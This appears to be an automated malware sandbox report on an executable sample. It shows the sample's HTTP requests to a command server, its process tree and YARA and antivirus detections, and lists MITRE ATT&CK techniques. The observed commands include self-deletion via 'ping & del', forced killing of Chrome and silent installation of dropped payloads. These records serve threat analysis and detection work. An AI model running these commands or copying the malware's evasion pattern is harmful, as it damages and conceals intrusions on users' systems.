2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" cont
Jan 29, 2021 17:38:50.929253101 CET	280	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:50.982594967 CET	281	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d3a430303779975d28f56fa479cae297c1611938330; expires=Sun, 28-Feb-21 16:38:50 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c115600001feaf425d000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=iLw946OTCvV%2FKGre4D1Lw10qYGGgZ%2Fic%2F%2FD%2Bx0hox8YM5BoEh9W%2BGMzh9TfzPfOunP7rl%2FO4Uq5kA%2B9lTH8LXko2fdi%2BDPIfKL5mxLkF5V4drTcJmw%3D%3D"}],"max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 619462c88eb01fea-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta na

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49730	104.21.23.16	80	C:\Users\user\Desktop\N1yprTBBXs.exe

Timestamp	kBytes transferred	Direction	Data
Jan 29, 2021 17:39:24.107032061 CET	1263	OUT	GET /info_old/ddd HTTP/1.1 Host: 84CFBA021A5A6662.xyz Accept: /
Jan 29, 2021 17:39:24.218722105 CET	1265	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:39:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d25830c08c40ffca102def47d10d59d851611938364; expires=Sun, 28-Feb-21 16:39:24 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c92f100004c5b9b35a000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=PzK5Mu7m3K5kCq%2BSGTJKpzkxGNnGcl2gZWoUayDxEDseCC%2BaipUH6ykDhQKqJyMHha2YAkvP9T%2BTj9AKv%2FcX2CtqylPHVQjYv6DkkKcnEf7GpNQucA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 61946397ed9e4c5b-AMS Data Raw: 31 30 64 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f Data Ascii: 10d5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewpo

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: N1yprTBBXs.exe PID: 6476 Parent PID: 5648

General

Start time:	17:38:33
Start date:	29/01/2021
Path:	C:\Users\user\Desktop\N1yprTBBXs.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\N1yprTBBXs.exe'
Imagebase:	0x400000
File size:	4999496 bytes
MD5 hash:	F7D7C89F3F5CBC925480B46B7B934157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.264281682.0000000002750000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Analysis Process: msiexec.exe PID: 6548 Parent PID: 6476

General

Start time:	17:38:37
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Imagebase:	0xe80000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 6272167835D47591.exe PID: 6612 Parent PID: 6476

General

Start time:	17:38:40
Start date:	29/01/2021
Path:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01
Imagebase:	0x400000
File size:	4999496 bytes
MD5 hash:	F7D7C89F3F5CBC925480B46B7B934157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000002.00000002.350264468.0000000002880000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 22%, Metadefender, Browse Detection: 59%, ReversingLabs
Reputation:	low

Analysis Process: msiexec.exe PID: 6640 Parent PID: 1704

General

Start time:	17:38:39
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 0B37D2846804C02059732A6A10D93625 C
Imagebase:	0xe80000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 6272167835D47591.exe PID: 6684 Parent PID: 6476

General

Start time:	17:38:41
Start date:	29/01/2021
Path:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01
Imagebase:	0x400000
File size:	4999496 bytes
MD5 hash:	F7D7C89F3F5CBC925480B46B7B934157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.278675442.0000000002730000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Analysis Process: cmd.exe PID: 6716 Parent PID: 6476

General

Start time:	17:38:41
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe'
Imagebase:	0x12a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6724 Parent PID: 6716

General

Start time:	17:38:42
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: PING.EXE PID: 6848 Parent PID: 6716

General

Start time:	17:38:43
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x7ff797770000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: 1611970727133.exe PID: 6944 Parent PID: 6612

General

Start time:	17:38:47
Start date:	29/01/2021
Path:	C:\Users\user\AppData\Roaming\1611970727133.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\1611970727133.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970727133.txt'
Imagebase:	0x400000
File size:	103632 bytes
MD5 hash:	EF6F72358CB02551CAEBE720FBC55F95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 14%, ReversingLabs
Reputation:	low

Analysis Process: cmd.exe PID: 7012 Parent PID: 6684

General

Start time:	17:38:48
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c taskkill /f /im chrome.exe
Imagebase:	0x12a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 7084 Parent PID: 7012

General

Start time:	17:38:50
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 7100 Parent PID: 6684

General

Start time:	17:38:50
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Imagebase:	0x12a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 7132 Parent PID: 7012

General

Start time:	17:38:50
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im chrome.exe
Imagebase:	0x1320000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 7140 Parent PID: 7100

General

Start time:	17:38:50
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: PING.EXE PID: 5112 Parent PID: 7100

General

Start time:	17:38:51
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0xe10000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: ThunderFW.exe PID: 7100 Parent PID: 6612

General

Start time:	17:39:17
Start date:	29/01/2021
Path:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Imagebase:	0xb10000
File size:	73160 bytes
MD5 hash:	F0372FF8A6148498B19E04203DBB9E69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 2%, ReversingLabs

Analysis Process: cmd.exe PID: 6096 Parent PID: 6612

General

Start time:	17:39:23
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Imagebase:	0x12a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6644 Parent PID: 6096

General

Start time:	17:39:25
Start date:	29/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: PING.EXE PID: 3656 Parent PID: 6096

General

Start time:	17:39:25
Start date:	29/01/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0xe10000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Browser extensions, File monitoring, Process monitoring, Process use of network, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	API monitoring, MBR, VBR
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
